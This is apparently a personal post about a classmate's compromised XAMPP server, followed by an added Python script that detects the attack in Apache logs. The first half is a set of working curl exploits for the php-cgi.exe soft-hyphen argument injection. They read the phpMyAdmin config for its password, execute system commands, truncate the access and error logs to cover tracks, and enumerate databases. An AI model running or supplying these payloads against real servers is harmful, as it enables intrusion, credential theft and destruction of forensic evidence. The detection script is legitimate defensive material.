A classmate said his website got hit. I spent a night looking into it; if a webshell or reverse-shell trojan had been planted there would be no saving it ~ let it go ~~~~~
The notable part is the -k parameter. At first I spent ages throwing requests at it with Postman and none got through; later I realised his certificate was untrusted.
XAMPP feels pretty sloppy: this vulnerability has existed since 2024, and the bundle on the official site has not been updated… not surprising it got hit.
```powershell
# Get phpinfo
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
  --header "Content-Type: application/x-www-form-urlencoded" `
  --data "<?php ob_clean(); phpinfo(); die(); ?>"

# Get the password
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
  --header "Content-Type: application/x-www-form-urlencoded" `
  --data "<?php ob_clean(); echo '---KEY_START---'; readfile('C:/xampp/phpMyAdmin/config.inc.php'); die(); ?>"

# View the log
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
  --header "Content-Type: application/x-www-form-urlencoded" `
  --data '<?php echo "--- Apache Access Log (Last 20 lines) ---\n"; system("powershell Get-Content C:\\xampp\\apache\\logs\\access.log -Tail 20"); exit; ?>'

# Clear the log
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
  --header "Content-Type: application/x-www-form-urlencoded" `
  --data '<?php $log="C:/xampp/apache/logs/access.log"; if(is_writable($log)){ file_put_contents($log, ""); echo "Access log has been truncated."; }else{ echo "Log file is not writable. It might be locked by Apache."; } exit; ?>'

# Clear the error log
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
  --header "Content-Type: application/x-www-form-urlencoded" `
  --data '<?php $log="C:/xampp/apache/logs/error.log"; if(is_writable($log)){ file_put_contents($log, ""); echo "Error log has been truncated."; }else{ echo "Log file not writable. It might be locked."; } exit; ?>'

# List databases
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
  --header "Content-Type: application/x-www-form-urlencoded" `
  --data '<?php echo "--- MySQL Databases ---\n"; system("C:\\xampp\\mysql\\bin\\mysql.exe -u root -e \"SHOW DATABASES;\""); exit; ?>'

--- MySQL Databases ---
Database
information_schema
mysql
performance_schema
phpmyadmin
test

# List all tables
curl.exe -k --location "http://localhost/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput" `
  --header "Content-Type: application/x-www-form-urlencoded" `
  --data '<?php echo "--- Tables in xxx_db ---\n"; system("C:\\xampp\\mysql\\bin\\mysql.exe -u root -e \"SHOW TABLES FROM xxx_db;\""); exit; ?>'
```
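Every request above shares one fingerprint: a `php-cgi.exe` target whose query string smuggles `-d` directives by encoding the dash as a soft hyphen (`%AD`), then turns on `allow_url_include` and points `auto_prepend_file` at `php://input`. That fingerprint is what an Apache access log will still show even after the attacker's own "clear the log" step has failed (the log is often locked by Apache, as the post's own commands anticipate). The script below is an added example, not code from the original post: it parses constructed Apache combined-format log lines, decodes the query with Latin-1 so the `%AD` byte survives, and flags php-cgi requests that carry an option switch or any of the three directives used in the post. The sample log lines, IPs and timestamps are constructed for the demonstration.

```python
# Added example (not from the original post): scan Apache access-log lines for the
# php-cgi.exe argument-injection pattern (soft hyphen %AD standing in for "-d").
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2025:10:00:02 +0800] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp%3A%2F%2Finput HTTP/1.1" 200 2048 "-" "curl/8.4.0"
10.0.0.9 - - [01/Jan/2025:10:00:03 +0800] "GET /php-cgi/php-cgi.exe?-d+cgi.force_redirect%3d0 HTTP/1.1" 200 100 "-" "curl/8.4.0"
10.0.0.7 - - [01/Jan/2025:10:00:04 +0800] "GET /phpmyadmin/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The directives the post's requests rely on to reach code execution.
DANGEROUS_DIRECTIVES = ("auto_prepend_file", "allow_url_include", "cgi.force_redirect")


def classify_request(target: str) -> Optional[dict]:
    """Return a finding for a php-cgi argument-injection request target, else None."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("php-cgi.exe"):
        return None
    # A raw %AD (U+00AD soft hyphen) in the query is the tell-tale sign; a plain
    # "-d" would also hand php-cgi a directive and is flagged as well.
    raw_soft_hyphen = "%ad" in query.lower()
    # Latin-1 decoding keeps %AD as the single character "\xad" instead of
    # collapsing it into a UTF-8 replacement character.
    decoded = unquote(query.replace("+", " "), encoding="latin-1")
    has_switch = bool(re.search(r"(?:^|\s)(?:-|\xad)[a-zA-Z]", decoded))
    directives = [d for d in DANGEROUS_DIRECTIVES if d in decoded]
    if not (has_switch or raw_soft_hyphen):
        return None
    return {
        "soft_hyphen": raw_soft_hyphen,
        "directives": directives,
        "decoded_query": decoded,
    }


def scan_log(text: str) -> List[dict]:
    """Parse each log line and collect findings with the request metadata attached."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparsable line; skip rather than crash the sweep
        finding = classify_request(m.group("target"))
        if finding is None:
            continue
        finding.update(
            ip=m.group("ip"),
            ts=m.group("ts"),
            method=m.group("method"),
            status=int(m.group("status")),
        )
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        marker = "soft-hyphen" if f["soft_hyphen"] else "plain-dash"
        print(f'{f["ts"]} {f["ip"]} {f["method"]} [{marker}] directives={f["directives"]}')
```

Run it against a real `C:\xampp\apache\logs\access.log` by reading the file instead of `SAMPLE_LOG`; a hit with `auto_prepend_file` among its directives and a 200 status means the server executed attacker-supplied PHP from the request body, so the host should be treated as compromised (the post's own conclusion) rather than merely patched.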